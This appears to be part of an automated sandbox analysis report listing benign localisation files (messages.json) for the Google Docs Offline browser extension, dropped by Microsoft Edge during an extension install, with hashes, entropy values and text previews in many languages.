                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                  MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                  SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                  SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                  SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                  MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                  SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                  SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                  SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                  MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                  SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                  SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                  SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                  MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                  SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                  SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                  SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                  Malicious:false
